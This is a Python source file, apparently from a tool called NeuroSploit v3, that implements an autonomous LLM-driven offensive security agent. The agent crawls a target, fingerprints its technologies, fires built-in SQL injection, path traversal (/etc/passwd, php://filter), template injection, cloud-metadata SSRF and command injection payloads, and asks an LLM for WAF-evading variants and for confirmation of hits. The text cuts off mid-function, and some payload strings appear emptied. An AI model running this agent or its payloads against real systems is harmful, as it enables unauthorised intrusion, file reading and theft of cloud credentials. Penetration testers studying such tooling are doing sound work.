"""
NeuroSploit v3 - AI Offensive Security Agent
This is a TRUE AI AGENT that:
1. Uses LLM for INTELLIGENT vulnerability testing (not blind payloads)
2. Analyzes responses with AI to confirm vulnerabilities (no false positives)
3. Uses recon data to inform testing strategy
4. Accepts custom .md prompt files
5. Generates real PoC code and exploitation steps
AUTHORIZATION: This is an authorized penetration testing tool.
All actions are performed with explicit permission.
"""
import asyncio
import aiohttp
import json
import re
import os
import sys
from typing import Dict, List, Any, Optional, Callable, Tuple
from dataclasses import dataclass, field
from datetime import datetime
from urllib.parse import urljoin, urlparse, parse_qs, urlencode, quote
from enum import Enum
from pathlib import Path
# Add parent path for imports
sys.path.insert(0, str(Path(__file__).parent.parent.parent))
try:
from core.llm_manager import LLMManager
except ImportError:
LLMManager = None
class AgentAction(Enum):
    """Closed set of action kinds the agent can take.

    Every member's value is the lowercase form of its name, so a member
    can be looked up from its string form, e.g. ``AgentAction("test")``.
    """

    DISCOVER = "discover"
    TEST = "test"
    EXPLOIT = "exploit"
    CHAIN = "chain"
    REPORT = "report"
    PIVOT = "pivot"
@dataclass
class Finding:
    """Record describing one reported vulnerability.

    The first six fields are required and positional; the rest default to
    empty values so a finding can be created first and enriched later.
    """

    # --- required ---
    vuln_type: str
    severity: str
    endpoint: str
    payload: str
    evidence: str
    exploitable: bool

    # --- optional ---
    confidence: str = "high"  # one of: high, medium, low
    # Mutable defaults go through default_factory so instances never share a list.
    exploitation_steps: List[str] = field(default_factory=list)
    poc_code: str = ""
    impact: str = ""
    chained_with: List[str] = field(default_factory=list)
    raw_request: str = ""
    raw_response: str = ""
    llm_analysis: str = ""
@dataclass
class AgentState:
    """Mutable bookkeeping for a single agent run against ``target``.

    Only ``target`` is required. Every collection starts empty and is
    created per instance through ``default_factory``.
    """

    target: str

    # What has been discovered so far.
    discovered_endpoints: List[str] = field(default_factory=list)
    discovered_params: Dict[str, List[str]] = field(default_factory=dict)
    technologies: List[str] = field(default_factory=list)

    # Results and test history.
    findings: List[Finding] = field(default_factory=list)
    tested_payloads: Dict[str, List[str]] = field(default_factory=dict)

    # Session material.
    session_cookies: Dict[str, str] = field(default_factory=dict)
    auth_tokens: List[str] = field(default_factory=list)

    # WAF detection flags.
    waf_detected: bool = False
    waf_type: str = ""

    # Progress tracking; a new state starts in the "recon" phase.
    current_phase: str = "recon"
    actions_taken: List[str] = field(default_factory=list)

    # Optional pre-collected recon data supplied by the caller.
    recon_context: Optional[Dict] = None
class AIPentestAgent:
"""
Autonomous AI Agent for Offensive Security Testing
This agent uses LLM to make INTELLIGENT decisions:
- What to test based on recon data
- How to craft context-aware payloads
- How to analyze responses to CONFIRM vulnerabilities
- How to chain attacks for maximum impact
NO FALSE POSITIVES - Every finding is confirmed by AI analysis.
"""
def __init__(
    self,
    target: str,
    llm_manager: Optional[Any] = None,
    log_callback: Optional[Callable] = None,
    auth_headers: Optional[Dict] = None,
    max_depth: int = 5,
    prompt_file: Optional[str] = None,
    recon_context: Optional[Dict] = None,
    config: Optional[Dict] = None
):
    """Set up the agent for one target.

    Args:
        target: URL under test; also stored on the fresh ``AgentState``.
        llm_manager: Ready-made LLM manager. When omitted, one is built
            from ``config`` if the ``LLMManager`` import succeeded.
        log_callback: Callable awaited as ``log(level, message)``;
            defaults to ``_default_log``.
        auth_headers: Extra headers merged into the HTTP session headers.
        max_depth: Stored on the instance as ``self.max_depth``.
        prompt_file: Optional prompt file, loaded via
            ``_load_custom_prompt``.
        recon_context: Pre-collected recon data, stored on the state.
        config: Configuration dict, also passed to ``LLMManager``.
    """
    # Plain attribute wiring.
    self.target = target
    self.max_depth = max_depth
    self.prompt_file = prompt_file
    self.llm_manager = llm_manager
    self.log = log_callback if log_callback else self._default_log
    self.auth_headers = auth_headers if auth_headers else {}
    self.config = config if config else {}
    self.session: Optional[aiohttp.ClientSession] = None
    self.state = AgentState(target=target, recon_context=recon_context)

    # Custom prompt stays None unless a file is given and can be read.
    self.custom_prompt = None
    if prompt_file:
        self._load_custom_prompt(prompt_file)

    # Build an LLM manager only when none was injected, the class could be
    # imported, and the caller passed a non-empty config.
    should_build_llm = not self.llm_manager and LLMManager and config
    if should_build_llm:
        try:
            self.llm_manager = LLMManager(config)
        except Exception as e:
            print(f"Warning: Could not initialize LLM manager: {e}")

    # Seed payloads; the LLM-generated payloads are added on top of these.
    self.base_payloads = self._load_base_payloads()
async def _default_log(self, level: str, message: str):
print(f"[{level.upper()}] {message}")
def _load_custom_prompt(self, prompt_file: str):
"""Load custom prompt from .md file"""
try:
path = Path(prompt_file)
if not path.exists():
# Try in prompts directory
path = Path("prompts") / prompt_file
if not path.exists():
path = Path("prompts/md_library") / prompt_file
if path.exists():
content = path.read_text()
self.custom_prompt = content
print(f"[+] Loaded custom prompt from: {path}")
else:
print(f"[!] Prompt file not found: {prompt_file}")
except Exception as e:
print(f"[!] Error loading prompt file: {e}")
def _load_base_payloads(self) -> Dict[str, List[str]]:
"""Load base attack payloads - LLM will enhance these"""
return {
"xss": [
"",
"\">",
"'-alert(1)-'",
"
",
],
"sqli": [
"'", "\"", "' OR '1'='1", "1' AND '1'='1",
"' UNION SELECT NULL--", "1' AND SLEEP(3)--",
],
"lfi": [
"../../../etc/passwd",
"....//....//etc/passwd",
"php://filter/convert.base64-encode/resource=index.php",
],
"ssti": [
"{{7*7}}", "${7*7}", "<%= 7*7 %>",
"{{config}}", "{{self.__class__}}",
],
"ssrf": [
"http://127.0.0.1", "http://localhost",
"http://169.254.169.254/latest/meta-data/",
],
"rce": [
"; id", "| id", "$(id)", "`id`",
],
}
async def __aenter__(self):
    """Open the shared aiohttp session and return the agent itself.

    The session uses a connector created with ``ssl=False`` and
    ``limit=10``, a total timeout of 30 seconds, and a fixed browser
    User-Agent. ``self.auth_headers`` is merged last, so caller-supplied
    headers override the default on a key clash.
    """
    default_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"}
    default_headers.update(self.auth_headers)
    self.session = aiohttp.ClientSession(
        connector=aiohttp.TCPConnector(ssl=False, limit=10),
        timeout=aiohttp.ClientTimeout(total=30),
        headers=default_headers,
    )
    return self
async def __aexit__(self, *args):
if self.session:
await self.session.close()
async def run(self) -> Dict[str, Any]:
"""
Main agent loop - Think, Act, Observe, Adapt
Uses LLM for intelligent decision making at each step.
"""
await self.log("info", "=" * 60)
await self.log("info", "AI OFFENSIVE SECURITY AGENT ACTIVATED")
await self.log("info", "=" * 60)
await self.log("info", f"Target: {self.target}")
await self.log("info", f"Mode: LLM-POWERED INTELLIGENT TESTING")
if self.custom_prompt:
await self.log("info", f"Custom prompt loaded: {len(self.custom_prompt)} chars")
await self.log("info", "")
try:
# Phase 1: Reconnaissance (use recon data if available)
await self.log("info", "[PHASE 1] RECONNAISSANCE")
await self._recon_phase()
# Phase 2: LLM-Powered Vulnerability Testing
await self.log("info", "")
await self.log("info", "[PHASE 2] INTELLIGENT VULNERABILITY TESTING")
await self._testing_phase()
# Phase 3: Exploitation (only confirmed vulnerabilities)
if self.state.findings:
await self.log("info", "")
await self.log("info", "[PHASE 3] EXPLOITATION")
await self._exploitation_phase()
# Phase 4: Attack Chaining
if len(self.state.findings) > 1:
await self.log("info", "")
await self.log("info", "[PHASE 4] ATTACK CHAINING")
await self._chaining_phase()
# Generate Report
await self.log("info", "")
await self.log("info", "[PHASE 5] REPORT GENERATION")
report = await self._generate_report()
return report
except Exception as e:
await self.log("error", f"Agent error: {str(e)}")
import traceback
traceback.print_exc()
return {"error": str(e), "findings": [f.__dict__ for f in self.state.findings]}
async def _recon_phase(self):
"""Reconnaissance - use existing recon data or perform basic discovery"""
# Use recon context if available
if self.state.recon_context:
await self.log("info", " Using provided recon context...")
await self._load_recon_context()
else:
await self.log("info", " Performing basic reconnaissance...")
await self._basic_recon()
await self.log("info", f" Found {len(self.state.discovered_endpoints)} endpoints")
await self.log("info", f" Found {sum(len(v) for v in self.state.discovered_params.values())} parameters")
await self.log("info", f" Technologies: {', '.join(self.state.technologies[:5]) or 'Unknown'}")
async def _load_recon_context(self):
"""Load data from recon context"""
ctx = self.state.recon_context
# Load endpoints from various recon sources
if ctx.get("data", {}).get("endpoints"):
self.state.discovered_endpoints.extend(ctx["data"]["endpoints"][:100])
if ctx.get("data", {}).get("urls"):
self.state.discovered_endpoints.extend(ctx["data"]["urls"][:100])
if ctx.get("data", {}).get("crawled_urls"):
self.state.discovered_endpoints.extend(ctx["data"]["crawled_urls"][:100])
# Load parameters
if ctx.get("data", {}).get("parameters"):
for param_data in ctx["data"]["parameters"]:
if isinstance(param_data, dict):
url = param_data.get("url", self.target)
params = param_data.get("params", [])
self.state.discovered_params[url] = params
elif isinstance(param_data, str):
self.state.discovered_params[self.target] = self.state.discovered_params.get(self.target, []) + [param_data]
# Load technologies
if ctx.get("data", {}).get("technologies"):
self.state.technologies.extend(ctx["data"]["technologies"])
# Load from attack surface
if ctx.get("attack_surface"):
surface = ctx["attack_surface"]
if surface.get("live_hosts"):
for host in surface.get("live_urls", [])[:50]:
if host not in self.state.discovered_endpoints:
self.state.discovered_endpoints.append(host)
# Deduplicate
self.state.discovered_endpoints = list(set(self.state.discovered_endpoints))
async def _basic_recon(self):
"""Perform basic reconnaissance when no recon data is available"""
# Fingerprint
await self._fingerprint_target()
# Discover common endpoints
common_paths = [
"/", "/login", "/admin", "/api", "/api/v1",
"/user", "/search", "/upload", "/config",
"/?id=1", "/?page=1", "/?q=test",
]
parsed = urlparse(self.target)
base_url = f"{parsed.scheme}://{parsed.netloc}"
for path in common_paths:
url = urljoin(base_url, path)
try:
async with self.session.get(url, allow_redirects=False) as resp:
if resp.status < 400 and resp.status != 404:
self.state.discovered_endpoints.append(url)
# Extract params
if "?" in url:
parsed_url = urlparse(url)
params = list(parse_qs(parsed_url.query).keys())
self.state.discovered_params[url] = params
except:
pass
async def _fingerprint_target(self):
"""Fingerprint the target"""
try:
async with self.session.get(self.target) as resp:
body = await resp.text()
headers = dict(resp.headers)
# Server detection
server = headers.get("Server", "")
if server:
self.state.technologies.append(f"Server: {server}")
# X-Powered-By
powered = headers.get("X-Powered-By", "")
if powered:
self.state.technologies.append(powered)
# Technology signatures
tech_sigs = {
"PHP": [".php", "PHPSESSID"],
"ASP.NET": [".aspx", "__VIEWSTATE"],
"Java": [".jsp", "JSESSIONID"],
"Python": ["django", "flask"],
"Node.js": ["express", "connect.sid"],
"WordPress": ["wp-content", "wp-includes"],
"Laravel": ["laravel", "XSRF-TOKEN"],
}
for tech, sigs in tech_sigs.items():
for sig in sigs:
if sig.lower() in body.lower() or sig in str(headers):
if tech not in self.state.technologies:
self.state.technologies.append(tech)
break
except Exception as e:
await self.log("debug", f"Fingerprint error: {e}")
async def _testing_phase(self):
"""LLM-powered vulnerability testing"""
# Determine what to test based on recon data
test_strategy = await self._get_test_strategy()
# Get endpoints to test
endpoints = self.state.discovered_endpoints[:20] or [self.target]
for endpoint in endpoints:
await self.log("info", f" Testing: {endpoint[:60]}...")
for vuln_type in test_strategy:
# Get LLM-enhanced payloads for this context
payloads = await self._get_smart_payloads(endpoint, vuln_type)
for payload in payloads[:5]:
result = await self._test_and_verify(endpoint, vuln_type, payload)
if result and result.get("confirmed"):
finding = Finding(
vuln_type=vuln_type,
severity=self._get_severity(vuln_type),
endpoint=endpoint,
payload=payload,
evidence=result.get("evidence", ""),
exploitable=result.get("exploitable", False),
confidence=result.get("confidence", "high"),
llm_analysis=result.get("analysis", ""),
raw_request=result.get("request", ""),
raw_response=result.get("response", "")[:2000],
impact=self._get_impact(vuln_type),
)
self.state.findings.append(finding)
await self.log("warning", f" [CONFIRMED] {vuln_type.upper()} - {result.get('confidence', 'high')} confidence")
break # Found vuln, move to next type
async def _get_test_strategy(self) -> List[str]:
"""Use LLM to determine what to test based on recon data"""
# Default strategy
default_strategy = ["xss", "sqli", "lfi", "ssti", "ssrf"]
if not self.llm_manager:
return default_strategy
try:
# Build context for LLM
context = {
"target": self.target,
"technologies": self.state.technologies,
"endpoints_count": len(self.state.discovered_endpoints),
"parameters_count": sum(len(v) for v in self.state.discovered_params.values()),
"sample_endpoints": self.state.discovered_endpoints[:5],
}
prompt = f"""Based on the following reconnaissance data, determine the most likely vulnerability types to test.
Target: {context['target']}
Technologies detected: {', '.join(context['technologies']) or 'Unknown'}
Endpoints found: {context['endpoints_count']}
Parameters found: {context['parameters_count']}
Sample endpoints: {context['sample_endpoints']}
Custom instructions: {self.custom_prompt[:500] if self.custom_prompt else 'None'}
Return a JSON array of vulnerability types to test, ordered by likelihood.
Valid types: xss, sqli, lfi, rce, ssti, ssrf, xxe, idor, open_redirect
Example: ["sqli", "xss", "lfi"]
IMPORTANT: Only return the JSON array, no other text."""
response = self.llm_manager.generate(prompt, "You are a penetration testing expert. Analyze recon data and suggest vulnerability tests.")
# Parse response
try:
# Find JSON array in response
match = re.search(r'\[.*?\]', response, re.DOTALL)
if match:
strategy = json.loads(match.group())
if isinstance(strategy, list) and len(strategy) > 0:
return strategy[:7]
except:
pass
except Exception as e:
await self.log("debug", f"LLM strategy error: {e}")
return default_strategy
async def _get_smart_payloads(self, endpoint: str, vuln_type: str) -> List[str]:
"""Get context-aware payloads from LLM"""
base = self.base_payloads.get(vuln_type, [])
if not self.llm_manager:
return base
try:
# Get endpoint context
params = self.state.discovered_params.get(endpoint, [])
techs = self.state.technologies
prompt = f"""Generate 3 specialized {vuln_type.upper()} payloads for this context:
Endpoint: {endpoint}
Parameters: {params}
Technologies: {techs}
WAF detected: {self.state.waf_detected} ({self.state.waf_type})
Requirements:
1. Payloads should be tailored to the detected technologies
2. If WAF detected, use evasion techniques
3. Include both basic and advanced payloads
Return ONLY a JSON array of payload strings.
Example: ["payload1", "payload2", "payload3"]"""
response = self.llm_manager.generate(prompt, "You are a security researcher. Generate effective but safe test payloads.")
try:
match = re.search(r'\[.*?\]', response, re.DOTALL)
if match:
smart_payloads = json.loads(match.group())
if isinstance(smart_payloads, list):
return smart_payloads + base
except:
pass
except Exception as e:
await self.log("debug", f"Smart payload error: {e}")
return base
async def _test_and_verify(self, endpoint: str, vuln_type: str, payload: str) -> Optional[Dict]:
"""Test a payload and use LLM to verify if it's a real vulnerability"""
try:
# Prepare request
parsed = urlparse(endpoint)
base_url = f"{parsed.scheme}://{parsed.netloc}{parsed.path}"
# Build params with payload
params = {}
if parsed.query:
for p in parsed.query.split("&"):
if "=" in p:
k, v = p.split("=", 1)
params[k] = payload
else:
test_params = self.state.discovered_params.get(endpoint, []) or ["id", "q", "search"]
for p in test_params[:3]:
params[p] = payload
# Send request
async with self.session.get(base_url, params=params, allow_redirects=False) as resp:
body = await resp.text()
status = resp.status
headers = dict(resp.headers)
# Build raw request for logging
raw_request = f"GET {resp.url}\n"
raw_request += "\n".join([f"{k}: {v}" for k, v in self.auth_headers.items()])
# First, do quick checks for obvious indicators
quick_result = self._quick_vuln_check(vuln_type, payload, body, status, headers)
if not quick_result.get("possible"):
return None
# If possible vulnerability, use LLM to confirm
if self.llm_manager:
confirmation = await self._llm_confirm_vulnerability(
vuln_type, payload, body[:3000], status, headers, endpoint
)
if confirmation.get("confirmed"):
return {
"confirmed": True,
"evidence": confirmation.get("evidence", quick_result.get("evidence", "")),
"exploitable": confirmation.get("exploitable", False),
"confidence": confirmation.get("confidence", "medium"),
"analysis": confirmation.get("analysis", ""),
"request": raw_request,
"response": body[:2000],
}
else:
# No LLM, use quick check result
if quick_result.get("high_confidence"):
return {
"confirmed": True,
"evidence": quick_result.get("evidence", ""),
"exploitable": True,
"confidence": "medium",
"analysis": "Confirmed by response analysis (no LLM)",
"request": raw_request,
"response": body[:2000],
}
except asyncio.TimeoutError:
if vuln_type == "sqli":
return {
"confirmed": True,
"evidence": "Request timeout - possible time-based SQL injection",
"exploitable": True,
"confidence": "medium",
"analysis": "Time-based blind SQLi detected",
}
except Exception as e:
await self.log("debug", f"Test error: {e}")
return None
def _quick_vuln_check(self, vuln_type: str, payload: str, body: str, status: int, headers: Dict) -> Dict:
"""Quick vulnerability check without LLM"""
result = {"possible": False, "high_confidence": False, "evidence": ""}
body_lower = body.lower()
if vuln_type == "xss":
# Check for exact payload reflection (unencoded)
if payload in body and "<" in payload:
result["possible"] = True
result["evidence"] = "XSS payload reflected without encoding"
# High confidence only if script tags execute
if "